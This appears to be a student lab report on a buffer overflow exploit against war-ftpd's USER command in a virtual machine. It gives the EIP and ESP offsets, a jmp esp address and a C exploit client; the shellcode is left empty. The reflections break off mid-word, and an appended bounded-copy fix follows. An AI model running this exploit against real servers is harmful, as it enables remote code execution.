Network Attack and Defense Lab Report

Name:            Student ID:            Class:
Lab title: Buffer overflow experiment        Lab date: November [day illegible] 2014
Instructor: Zhang Yuqing        Lab score:        Acceptance comments:

Lab objectives:
1. Master the principle of buffer overflows.
2. Master the commonly used buffer overflow methods.
3. Understand the harm that buffer overflows can cause.
4. Master methods for preventing and avoiding buffer overflow attacks.

Lab environment:
Host system: Windows 8 x64
Virtual machine: Windows XP (SP3) (IP: [not given])
Overflow target: war-ftpd
Debugger: CDB (Debugging Tools for Windows)
Development environment: Visual Studio 2013
Language: C

Buffer overflow principle:

Searching for war-ftp in Metasploit shows that under Windows the program has a "username overflow" vulnerability: when a client issues the command `user <username>` and the username is too long, a buffer overflow occurs.

When the computer calls a function function(arg1, ..., argm), the stack is laid out as in Figure 1. First the actual arguments are pushed from right to left, argm down to arg1. Then the return address RET is pushed. At that moment EBP points to the base of the calling function's frame and ESP to the top of the stack; the current EBP is pushed, and then the value of ESP is copied into EBP, so that EBP now points to the base of the new function's frame. Once inside the function, the local variables are pushed in turn, with ESP always pointing to the top of the stack. There is also the EIP register, which holds the address of the next instruction to execute; when the program crashes, the value in EIP is whatever has been written over RET.

By sending a specially constructed string in which no two positions carry the same sequence of bytes, we can work out where RET sits in the string from the value found in EIP. Once the position of RET is known, we only need to place the jump instruction we want at that position to redirect execution. For convenience we use an instruction that already exists in the system, jmp esp. A commonly used address of a jmp esp instruction in memory is 0x7ffa4512; CDB's `u 7ffa4512` confirms whether that address really holds jmp esp. jmp esp makes EIP point to the location ESP points to; we locate that position in the string the same way we located RET, then replace that part of the string with shellcode, so the computer executes the shellcode and the attack succeeds. Other instructions such as jmp esi can be used the same way, given the address of a jmp esi instruction in system memory and the memory esi points to; several jumps can also be chained.

Figure 1. Function stack layout (top of stack first, higher addresses further down):

    ESP ->  local variable n
            ...
            local variable 2
            local variable 1
    EBP ->  saved EBP
            RET
            function parameter 1
            function parameter 2
            ...
            function parameter m

Lab steps:

1. Test whether the vulnerability exists.
1) On the virtual machine, attach CDB to the war-ftpd process.
2) From the host, establish a connection to war-ftpd on the virtual machine with `ftp -n` and send `user` followed by a long run of "A" characters. (Screenshot: the server greets with `220 Please enter your user name.` and answers the long user name with `331 User name okay, Need password.`)
3) The overflow succeeds: CDB catches the exception in war-ftpd, and EIP has been overwritten with "AAAA" (0x41414141). The location ESP points to is also filled entirely with the character A. (CDB output: `Access violation - code c0000005 (first chance)`, `eip=41414141`; `dd esp` shows 41414141 repeated.)

2. Locate the position of RET in the string and the position ESP points to.
1) Use patternCreate to build a 1000-byte string with no repeating sub-sequence (the screenshot shows patternCreate.pl run under perl.exe, with the output saved to a .txt file; the pattern begins Aa0Aa1Aa2Aa3...).
(Screenshot: the same `ftp -n` session as before, sending `user` followed by the pattern string; the server replies `331 User name okay, Need password.`, then a `421` reply and the remote host closes the connection.)
4) The program overflows. From the CDB screenshot, EIP = 0x32714131 and the dword at the location ESP points to is 0x71413471.
5) Use patternOffset to locate RET and the position ESP points to: RET is at offset 485 in the string, and the location ESP points to is at offset 493.
6) Construct the string and write the attack program. Layout of the `user` argument (byte offsets):

    offset      contents
    0 - 480     481 filler bytes (NOP; the program uses 0x41)
    481 - 484   saved EBP (4 bytes)
    485 - 488   address of jmp esp
    489 - 492   4 filler bytes (NOP)
    493 - 828   336-byte shellcode
    829 - 999   filler bytes (NOP)
    then "\r\n"

3. Test the attack program: it pops up a calculator window in the virtual machine.

Appendix: attack program source code

#include "stdafx.h"      /* Visual Studio precompiled header: _tmain, _TCHAR */
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32")

int _tmain(int argc, _TCHAR* argv[])
{
    /* 336-byte payload that starts the calculator; the bytes are not legible
       in the scanned report and are not reproduced here. */
    char shellcode[] = "";
    /* address of a jmp esp instruction, 0x7ffa4512, in little-endian order */
    char jumpesp[] = "\x12\x45\xfa\x7f";
    WSADATA WSAData;
    char Buff[1000], Recv[1024];
    struct sockaddr_in ipAddress;
    SOCKET s;

    if (WSAStartup(MAKEWORD(2, 2), &WSAData) != 0) {
        printf("WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }
    s = socket(AF_INET, SOCK_STREAM, 0);
    ipAddress.sin_family = AF_INET;
    ipAddress.sin_addr.s_addr = inet_addr("TARGET_IP"); /* VM address; not legible in the scan */
    ipAddress.sin_port = htons(21);
    if (connect(s, (struct sockaddr *)&ipAddress, sizeof(ipAddress)) == SOCKET_ERROR) {
        printf("connection error\n");
        closesocket(s);
        WSACleanup();
        return 1;
    }

    /* fill with 'A' (0x41), then place the pieces at the measured offsets */
    memset(Buff, 0x41, sizeof(Buff) - 1);
    memcpy(&Buff[485], jumpesp, sizeof(jumpesp) - 1);     /* lands on RET */
    memcpy(&Buff[493], shellcode, sizeof(shellcode) - 1); /* where ESP points after jmp esp */
    Buff[493 + sizeof(shellcode) - 1] = 0;

    recv(s, Recv, sizeof(Recv), 0);                       /* read the 220 banner */
    sprintf(Recv, "user %s\r\n", Buff);
    send(s, Recv, (int)strlen(Recv), 0);
    closesocket(s);
    WSACleanup();
    return 0;
}

Lab reflections (problems encountered and how they were solved, what was learned, and proposed ways to prevent this kind of buffer overflow vulnerability):

1. While doing this lab I ran into almost every problem there was to run into, because I had not understood very well how a computer's memory behaves at run time, and I had never used metas
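The reflections section asks for ways to prevent this class of vulnerability. The following C code is an added example, not part of the report or of war-ftpd: it models the unchecked `USER <name>` copy that lets a long name run past its buffer into the saved EBP and RET, and shows the bounded handler that checks the length before any copy. The buffer size NAME_BUF and the sample lines are constructed.

```c
/* Added example, not from the lab report: the unchecked "USER <name>" copy
 * behind this class of overflow, and the bounded handler that closes it. */
#include <stdio.h>
#include <string.h>

#define NAME_BUF 128  /* constructed: size of the handler's stack buffer */
/* Locate the argument of a "USER <name>\r\n" line without copying it.
 * Returns its length, or -1 if the line is not a USER command. */
static int user_arg(const char *line, const char **arg)
{
    if (strncmp(line, "USER ", 5) != 0) return -1;
    *arg = line + 5;
    return (int)strcspn(*arg, "\r\n");  /* argument ends at CR or LF */
}

/* The vulnerable pattern is strcpy(name, arg) into char name[NAME_BUF]. Instead
 * of doing that copy, report how many bytes it would write past name[] (0 = fits). */
int overflow_bytes_unchecked(const char *line)
{
    const char *arg;
    int len = user_arg(line, &arg);
    if (len < 0) return 0;
    return (len + 1 > NAME_BUF) ? len + 1 - NAME_BUF : 0;  /* +1 for the NUL */
}

/* Hardened handler: check the length against the destination before any
 * copy, so an over-long name is refused and the frame above name[] is intact. */
int handle_user_bounded(const char *line, char *name, size_t namesz)
{
    const char *arg;
    int len = user_arg(line, &arg);
    if (len < 0 || (size_t)len >= namesz) {
        name[0] = '\0';
        return 0;  /* reject: not a USER command, or name too long */
    }
    memcpy(name, arg, (size_t)len);
    name[len] = '\0';
    return 1;
}

int main(void)
{
    char line[1100] = "USER ", name[NAME_BUF];
    memset(line + 5, 'A', 1000);         /* constructed: 1000-'A' user name */
    memcpy(line + 1005, "\r\n", 3);      /* copies the terminating NUL too */
    printf("long name: %d bytes past name[], accepted=%d\n",
           overflow_bytes_unchecked(line), handle_user_bounded(line, name, sizeof name));
    printf("alice: accepted=%d\n", handle_user_bounded("USER alice\r\n", name, sizeof name));
    return 0;
}
```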
